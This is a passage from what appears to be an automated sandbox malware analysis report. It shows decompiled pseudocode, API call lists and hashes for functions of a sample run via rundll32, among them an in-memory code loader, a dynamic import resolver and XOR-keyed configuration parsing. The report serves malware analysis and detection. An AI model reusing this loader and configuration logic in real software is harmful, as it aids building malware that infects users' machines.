                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04BF53C0
                                          • HeapFree.KERNEL32(00000000,?), ref: 04BF53CF
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                          • String ID:
                                          • API String ID: 3080378247-0
                                          • Opcode ID: 146809abda298acb423959bf6f8e9e1dd0b37fbd4d1de7d6ba0f7789ce1bda06
                                          • Instruction ID: db74434e781eaf98c5084733e070f02a6c07e4c17ca09991277d5cb7694f2a33
                                          • Opcode Fuzzy Hash: 146809abda298acb423959bf6f8e9e1dd0b37fbd4d1de7d6ba0f7789ce1bda06
                                          • Instruction Fuzzy Hash: 2C61AE71500205AFDB21ABB8EC48E567BBCEB48304F050516FA0ED7251DB39ED5ADBB4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BFADA5, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 51%
                                          			E04BFADA5(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x4bf0000;
				_t115 = _t139[3] + 0x4bf0000;
				_t131 = _t139[4] + 0x4bf0000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x4bf0000;
				_v16 = _t139[5] + 0x4bf0000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x4bf0002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x4bfd1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x4bfd1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x4bfd1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x4bfd19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x4bfd1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t138 = LoadLibraryA(_v60);
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x4bfd198; // 0x0
										 *_t102 = _t125;
										 *0x4bfd198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x4bfd19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

































                                          0x04bfadb4
                                          0x04bfadca
                                          0x04bfadd0
                                          0x04bfadd2
                                          0x04bfadd7
                                          0x04bfaddd
                                          0x04bfade2
                                          0x04bfade5
                                          0x04bfadf3
                                          0x04bfadfa
                                          0x04bfadfd
                                          0x04bfae00
                                          0x04bfae01
                                          0x04bfae04
                                          0x04bfae07
                                          0x04bfae0a
                                          0x04bfae0f
                                          0x04bfae1e
                                          0x00000000
                                          0x04bfae24
                                          0x04bfae2e
                                          0x04bfae38
                                          0x04bfae3d
                                          0x04bfae3f
                                          0x04bfae49
                                          0x04bfae4c
                                          0x04bfae4f
                                          0x04bfae55
                                          0x04bfae57
                                          0x04bfae57
                                          0x04bfae5a
                                          0x04bfae5d
                                          0x04bfae62
                                          0x04bfae66
                                          0x04bfae79
                                          0x04bfae7b
                                          0x04bfaf23
                                          0x04bfaf23
                                          0x04bfaf2a
                                          0x04bfaf2d
                                          0x04bfaf37
                                          0x04bfaf37
                                          0x04bfaf3b
                                          0x04bfafb9
                                          0x04bfafbc
                                          0x04bfafbe
                                          0x04bfafbe
                                          0x04bfafc5
                                          0x04bfafc7
                                          0x04bfafd1
                                          0x04bfafd4
                                          0x04bfafd7
                                          0x04bfafd7
                                          0x00000000
                                          0x04bfaf3d
                                          0x04bfaf40
                                          0x04bfaf6e
                                          0x04bfaf78
                                          0x04bfaf7c
                                          0x04bfaf84
                                          0x04bfaf87
                                          0x04bfaf8e
                                          0x04bfaf98
                                          0x04bfaf98
                                          0x04bfaf9c
                                          0x04bfafa1
                                          0x04bfafb0
                                          0x04bfafb6
                                          0x04bfafb6
                                          0x04bfaf9c
                                          0x00000000
                                          0x04bfaf47
                                          0x04bfaf4a
                                          0x04bfaf52
                                          0x04bfaf67
                                          0x04bfaf6c
                                          0x00000000
                                          0x00000000
                                          0x04bfaf6c
                                          0x00000000
                                          0x04bfaf52
                                          0x04bfaf40
                                          0x04bfaf3b
                                          0x04bfae81
                                          0x04bfae88
                                          0x04bfae98
                                          0x04bfaea1
                                          0x04bfaea5
                                          0x04bfaee8
                                          0x04bfaef4
                                          0x04bfaf1d
                                          0x04bfaef6
                                          0x04bfaefa
                                          0x04bfaf00
                                          0x04bfaf08
                                          0x04bfaf0a
                                          0x04bfaf0d
                                          0x04bfaf13
                                          0x04bfaf15
                                          0x04bfaf15
                                          0x04bfaf08
                                          0x04bfaefa
                                          0x00000000
                                          0x04bfaef4
                                          0x04bfaead
                                          0x04bfaeb0
                                          0x04bfaeb7
                                          0x04bfaec7
                                          0x04bfaeca
                                          0x04bfaeda
                                          0x00000000
                                          0x04bfaee0
                                          0x04bfaec1
                                          0x04bfaec5
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04bfaec5
                                          0x04bfae92
                                          0x04bfae96
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04bfae96
                                          0x04bfae6f
                                          0x04bfae73
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          APIs
                                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 04BFAE1E
                                          • LoadLibraryA.KERNEL32(?), ref: 04BFAE9B
                                          • GetLastError.KERNEL32 ref: 04BFAEA7
                                          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 04BFAEDA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                          • String ID: $
                                          • API String ID: 948315288-3993045852
                                          • Opcode ID: 7b0f6f7eafb382e00e8ac2d7f4623f82e63b898fe4acd2a8bb076b50a0b3dc79
                                          • Instruction ID: 9efe1a9e030f67774a585f725aac6749614284e974c5cc722d024b2ad538ddb8
                                          • Opcode Fuzzy Hash: 7b0f6f7eafb382e00e8ac2d7f4623f82e63b898fe4acd2a8bb076b50a0b3dc79
                                          • Instruction Fuzzy Hash: 7A811BB5A00209AFDB15CFA8D884AADB7F5FF4C710F14806AEA0DD7240E774E949CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF30FC, Relevance: 15.1, APIs: 10, Instructions: 102stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 56%
                                          			E04BF30FC(void* __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				void* __esi;
				intOrPtr _t42;
				intOrPtr _t44;
				void* _t46;
				void* _t47;
				void* _t48;
				int _t49;
				intOrPtr _t53;
				WCHAR* _t56;
				void* _t57;
				int _t58;
				intOrPtr _t64;
				void* _t69;
				intOrPtr* _t73;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t79;
				intOrPtr* _t85;
				intOrPtr _t88;

				_t74 = __ecx;
				_t79 =  *0x4bfd33c; // 0x70d9bb0
				_v20 = 8;
				_v16 = GetTickCount();
				_t42 = E04BF9810(_t74,  &_v16);
				_v12 = _t42;
				if(_t42 == 0) {
					_v12 = 0x4bfc19c;
				}
				_t44 = E04BF47E1(_t79);
				_v8 = _t44;
				if(_t44 != 0) {
					_t85 = __imp__;
					_t46 =  *_t85(_v12, _t69);
					_t47 =  *_t85(_v8);
					_t48 =  *_t85(_a4);
					_t49 = lstrlenW(_a8);
					_t53 = E04BF58BE(lstrlenW(0x4bfeb38) + _t48 + _t46 + _t46 + _t47 + _t49 + lstrlenW(0x4bfeb38) + _t48 + _t46 + _t46 + _t47 + _t49 + 2);
					_v16 = _t53;
					if(_t53 != 0) {
						_t75 =  *0x4bfd2a4; // 0x24da5a8
						_t73 =  *0x4bfd11c; // 0x4bfabc9
						_t18 = _t75 + 0x4bfeb38; // 0x530025
						 *_t73(_t53, _t18, _v12, _v12, _a4, _v8, _a8);
						_t56 =  *_t85(_v8);
						_a8 = _t56;
						_t57 =  *_t85(_a4);
						_t58 = lstrlenW(_a12);
						_t88 = E04BF58BE(lstrlenW(0x4bfec58) + _a8 + _t57 + _t58 + lstrlenW(0x4bfec58) + _a8 + _t57 + _t58 + 2);
						if(_t88 == 0) {
							E04BF147E(_v16);
						} else {
							_t64 =  *0x4bfd2a4; // 0x24da5a8
							_t31 = _t64 + 0x4bfec58; // 0x73006d
							 *_t73(_t88, _t31, _a4, _v8, _a12);
							 *_a16 = _v16;
							_v20 = _v20 & 0x00000000;
							 *_a20 = _t88;
						}
					}
					E04BF147E(_v8);
				}
				return _v20;
			}


























                                          0x04bf30fc
                                          0x04bf3104
                                          0x04bf310a
                                          0x04bf311a
                                          0x04bf311d
                                          0x04bf3122
                                          0x04bf3127
                                          0x04bf3129
                                          0x04bf3129
                                          0x04bf3132
                                          0x04bf3137
                                          0x04bf313c
                                          0x04bf3142
                                          0x04bf314c
                                          0x04bf3155
                                          0x04bf315c
                                          0x04bf316a
                                          0x04bf317c
                                          0x04bf3181
                                          0x04bf3186
                                          0x04bf318f
                                          0x04bf3198
                                          0x04bf31a1
                                          0x04bf31af
                                          0x04bf31b7
                                          0x04bf31bc
                                          0x04bf31bf
                                          0x04bf31ca
                                          0x04bf31e1
                                          0x04bf31e5
                                          0x04bf3218
                                          0x04bf31e7
                                          0x04bf31ea
                                          0x04bf31f2
                                          0x04bf31fd
                                          0x04bf3205
                                          0x04bf320d
                                          0x04bf3211
                                          0x04bf3211
                                          0x04bf31e5
                                          0x04bf3220
                                          0x04bf3225
                                          0x04bf322c

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 04BF3111
                                          • lstrlen.KERNEL32(00000000,80000002), ref: 04BF314C
                                          • lstrlen.KERNEL32(?), ref: 04BF3155
                                          • lstrlen.KERNEL32(00000000), ref: 04BF315C
                                          • lstrlenW.KERNEL32(80000002), ref: 04BF316A
                                          • lstrlenW.KERNEL32(04BFEB38), ref: 04BF3173
                                          • lstrlen.KERNEL32(?), ref: 04BF31B7
                                          • lstrlen.KERNEL32(?), ref: 04BF31BF
                                          • lstrlenW.KERNEL32(?), ref: 04BF31CA
                                          • lstrlenW.KERNEL32(04BFEC58), ref: 04BF31D3
                                            • Part of subcall function 04BF147E: HeapFree.KERNEL32(00000000,00000000,04BF1D11,00000000,?,?,-00000008), ref: 04BF148A
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$CountFreeHeapTick
                                          • String ID:
                                          • API String ID: 2535036572-0
                                          • Opcode ID: 435e808a8947fb1495219165e8fef1373912472ac755f686b914ab427d57c3e4
                                          • Instruction ID: 71a7cd3a1401633166c5c041e635ba192c3796477fa02ecb8064f31fce29e9ee
                                          • Opcode Fuzzy Hash: 435e808a8947fb1495219165e8fef1373912472ac755f686b914ab427d57c3e4
                                          • Instruction Fuzzy Hash: A1313A72900209AFDF11AFA4CC4499E7FB9FF44344B154495EA08A7221DB35EA29DFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF1493, Relevance: 12.1, APIs: 8, Instructions: 110librarymemoryloaderCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 73%
                                          			E04BF1493(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t39;
				intOrPtr _t46;
				intOrPtr _t49;
				void* _t57;
				void* _t66;
				intOrPtr _t67;
				intOrPtr* _t68;
				intOrPtr* _t69;

				_t1 = __eax + 0x14; // 0x74183966
				_t67 =  *_t1;
				_t36 = E04BF57D8(__ecx,  *(_t67 + 0xc),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				memcpy(_v12,  *(_t67 + 8),  *(_t67 + 0xc));
				_t39 = _v12(_v12);
				_v8 = _t39;
				if(_t39 == 0 && ( *0x4bfd260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t46 =  *0x4bfd2a4; // 0x24da5a8
					_t18 = _t46 + 0x4bfe3e6; // 0x73797325
					_t66 = E04BF77E6(_t18);
					if(_t66 == 0) {
						_v8 = 8;
					} else {
						_t49 =  *0x4bfd2a4; // 0x24da5a8
						_t19 = _t49 + 0x4bfe747; // 0x70d8cef
						_t20 = _t49 + 0x4bfe0af; // 0x4e52454b
						_t69 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t69 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E04BF684E();
							_t57 =  *_t69(0, _t66, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E04BF684E();
							if(_t57 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x4bfd238, 0, _t66);
					}
				}
				_t68 = _v16;
				 *((intOrPtr*)(_t68 + 0x18))( *((intOrPtr*)(_t68 + 0x1c))( *_t68));
				E04BF147E(_t68);
				goto L12;
			}



















                                          0x04bf149b
                                          0x04bf149b
                                          0x04bf14aa
                                          0x04bf14b1
                                          0x04bf14b6
                                          0x04bf15c6
                                          0x04bf15cd
                                          0x04bf15cd
                                          0x04bf14c5
                                          0x04bf14d0
                                          0x04bf14d3
                                          0x04bf14d8
                                          0x04bf14ed
                                          0x04bf14f3
                                          0x04bf14f4
                                          0x04bf14f7
                                          0x04bf14fd
                                          0x04bf1500
                                          0x04bf1505
                                          0x04bf150d
                                          0x04bf1519
                                          0x04bf151d
                                          0x04bf15ad
                                          0x04bf1523
                                          0x04bf1523
                                          0x04bf1528
                                          0x04bf152f
                                          0x04bf1543
                                          0x04bf1547
                                          0x04bf1596
                                          0x04bf1549
                                          0x04bf154a
                                          0x04bf1551
                                          0x04bf156a
                                          0x04bf156c
                                          0x04bf1570
                                          0x04bf1577
                                          0x04bf1591
                                          0x04bf1579
                                          0x04bf1582
                                          0x04bf1587
                                          0x04bf1587
                                          0x04bf1577
                                          0x04bf15a5
                                          0x04bf15a5
                                          0x04bf151d
                                          0x04bf15b4
                                          0x04bf15bd
                                          0x04bf15c1
                                          0x00000000

                                          APIs
                                            • Part of subcall function 04BF57D8: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04BF14AF,?,?,?,?,00000000,00000000), ref: 04BF57FD
                                            • Part of subcall function 04BF57D8: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04BF581F
                                            • Part of subcall function 04BF57D8: GetProcAddress.KERNEL32(00000000,614D775A), ref: 04BF5835
                                            • Part of subcall function 04BF57D8: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04BF584B
                                            • Part of subcall function 04BF57D8: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04BF5861
                                            • Part of subcall function 04BF57D8: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04BF5877
                                          • memcpy.NTDLL(?,?,?,?,?,?,?,00000000,00000000), ref: 04BF14C5
                                          • memset.NTDLL ref: 04BF1500
                                            • Part of subcall function 04BF77E6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,04BF333A,73797325), ref: 04BF77F7
                                            • Part of subcall function 04BF77E6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04BF7811
                                          • GetModuleHandleA.KERNEL32(4E52454B,070D8CEF,73797325), ref: 04BF1536
                                          • GetProcAddress.KERNEL32(00000000), ref: 04BF153D
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04BF15A5
                                            • Part of subcall function 04BF684E: GetProcAddress.KERNEL32(36776F57,04BF935F), ref: 04BF6869
                                          • CloseHandle.KERNEL32(00000000,00000001), ref: 04BF1582
                                          • CloseHandle.KERNEL32(?), ref: 04BF1587
                                          • GetLastError.KERNEL32(00000001), ref: 04BF158B
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemcpymemset
                                          • String ID:
                                          • API String ID: 478747673-0
                                          • Opcode ID: 4d7ef0ff09320ba35a15c17a25c6715218d1f66c76e2fd3b8c30fc141a6bd6c3
                                          • Instruction ID: 6a807f60f0cd389f36a4318958b544abd725ea51359759e617661f102a64b9bf
                                          • Opcode Fuzzy Hash: 4d7ef0ff09320ba35a15c17a25c6715218d1f66c76e2fd3b8c30fc141a6bd6c3
                                          • Instruction Fuzzy Hash: 223103B5900208EFDB11AFF8DC88D9EBBBCEB04344F1145A5E60AA7110D735AD499B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF4D2C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 63%
                                          			E04BF4D2C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x4bfd2a4; // 0x24da5a8
				_t1 = _t9 + 0x4bfe62c; // 0x253d7325
				_t36 = 0;
				_t28 = E04BF6027(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E04BF58BE(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E04BF6F33(_t34, _t41, _a8);
						E04BF147E(_t41);
						_t42 = E04BF4759(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E04BF147E(_t36);
							_t36 = _t42;
						}
						_t43 = E04BF4858(_t36, _t33);
						if(_t43 != 0) {
							E04BF147E(_t36);
							_t36 = _t43;
						}
					}
					E04BF147E(_t28);
				}
				return _t36;
			}














                                          0x04bf4d2c
                                          0x04bf4d2f
                                          0x04bf4d30
                                          0x04bf4d38
                                          0x04bf4d3f
                                          0x04bf4d46
                                          0x04bf4d4a
                                          0x04bf4d50
                                          0x04bf4d57
                                          0x04bf4d5c
                                          0x04bf4d6e
                                          0x04bf4d72
                                          0x04bf4d76
                                          0x04bf4d7c
                                          0x04bf4d81
                                          0x04bf4d91
                                          0x04bf4d93
                                          0x04bf4daa
                                          0x04bf4dae
                                          0x04bf4db1
                                          0x04bf4db6
                                          0x04bf4db6
                                          0x04bf4dbf
                                          0x04bf4dc3
                                          0x04bf4dc6
                                          0x04bf4dcb
                                          0x04bf4dcb
                                          0x04bf4dc3
                                          0x04bf4dce
                                          0x04bf4dce
                                          0x04bf4dd9

                                          APIs
                                            • Part of subcall function 04BF6027: lstrlen.KERNEL32(00000000,00000000,00000000,74ECC740,?,?,?,04BF4D46,253D7325,00000000,00000000,74ECC740,?,?,04BF52FE,?), ref: 04BF608E
                                            • Part of subcall function 04BF6027: sprintf.NTDLL ref: 04BF60AF
                                          • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,04BF52FE,?,070D95B0), ref: 04BF4D57
                                          • lstrlen.KERNEL32(?,?,?,04BF52FE,?,070D95B0), ref: 04BF4D5F
                                            • Part of subcall function 04BF58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04BF1C51), ref: 04BF58CA
                                          • strcpy.NTDLL ref: 04BF4D76
                                          • lstrcat.KERNEL32(00000000,?), ref: 04BF4D81
                                            • Part of subcall function 04BF6F33: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,04BF4D90,00000000,?,?,?,04BF52FE,?,070D95B0), ref: 04BF6F4A
                                            • Part of subcall function 04BF147E: HeapFree.KERNEL32(00000000,00000000,04BF1D11,00000000,?,?,-00000008), ref: 04BF148A
                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04BF52FE,?,070D95B0), ref: 04BF4D9E
                                            • Part of subcall function 04BF4759: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04BF4DAA,00000000,?,?,04BF52FE,?,070D95B0), ref: 04BF4763
                                            • Part of subcall function 04BF4759: _snprintf.NTDLL ref: 04BF47C1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                          • String ID: =
                                          • API String ID: 2864389247-1428090586
                                          • Opcode ID: 520deb2b28d0394dd4831d8df5a8108c4e87fc248b993f092d222ea055337439
                                          • Instruction ID: ec243f519d6fbe2f979428ac68207484855945ed2af381427368d54fd630311f
                                          • Opcode Fuzzy Hash: 520deb2b28d0394dd4831d8df5a8108c4e87fc248b993f092d222ea055337439
                                          • Instruction Fuzzy Hash: 85117377A011297756227BFC9C84C6F3AADEE956683050596FB0CAB100DE38ED0A67B0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF98F7, Relevance: 9.2, APIs: 6, Instructions: 187memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 86%
                                          			E04BF98F7(void* __ebx, int* __ecx, void* __edi, void* __esi) {
				int _v8;
				void* _v12;
				signed int _t18;
				signed int _t23;
				void* _t28;
				char* _t29;
				char* _t30;
				char* _t31;
				char* _t32;
				char* _t33;
				void* _t34;
				void* _t35;
				signed int _t41;
				void* _t43;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t54;
				signed int _t58;
				signed int _t62;
				signed int _t66;
				void* _t69;
				void* _t70;
				void* _t80;
				void* _t83;
				intOrPtr _t86;

				_t83 = __esi;
				_t80 = __edi;
				_t72 = __ecx;
				_t69 = __ebx;
				_push(__ecx);
				_push(__ecx);
				_t18 =  *0x4bfd2a0; // 0x59935a40
				if(E04BF96D5( &_v12,  &_v8, _t18 ^ 0xb8bb0424) != 0 && _v8 >= 0x90) {
					 *0x4bfd2d0 = _v12;
				}
				_t23 =  *0x4bfd2a0; // 0x59935a40
				if(E04BF96D5( &_v12,  &_v8, _t23 ^ 0xd62287a1) == 0) {
					_t28 = 2;
					return _t28;
				} else {
					_push(_t69);
					_t70 = _v12;
					_push(_t83);
					_push(_t80);
					if(_t70 == 0) {
						_t29 = 0;
					} else {
						_t66 =  *0x4bfd2a0; // 0x59935a40
						_t29 = E04BF10CA(_t72, _t70, _t66 ^ 0x48b4463f);
					}
					if(_t29 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t29, 0,  &_v8) != 0) {
							 *0x4bfd240 = _v8;
						}
					}
					if(_t70 == 0) {
						_t30 = 0;
					} else {
						_t62 =  *0x4bfd2a0; // 0x59935a40
						_t30 = E04BF10CA(_t72, _t70, _t62 ^ 0x11ba0dc3);
					}
					if(_t30 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t30, 0,  &_v8) != 0) {
							 *0x4bfd244 = _v8;
						}
					}
					if(_t70 == 0) {
						_t31 = 0;
					} else {
						_t58 =  *0x4bfd2a0; // 0x59935a40
						_t31 = E04BF10CA(_t72, _t70, _t58 ^ 0x01dd0365);
					}
					if(_t31 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
							 *0x4bfd248 = _v8;
						}
					}
					if(_t70 == 0) {
						_t32 = 0;
					} else {
						_t54 =  *0x4bfd2a0; // 0x59935a40
						_t32 = E04BF10CA(_t72, _t70, _t54 ^ 0x3cf823ca);
					}
					if(_t32 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
							 *0x4bfd004 = _v8;
						}
					}
					if(_t70 == 0) {
						_t33 = 0;
					} else {
						_t50 =  *0x4bfd2a0; // 0x59935a40
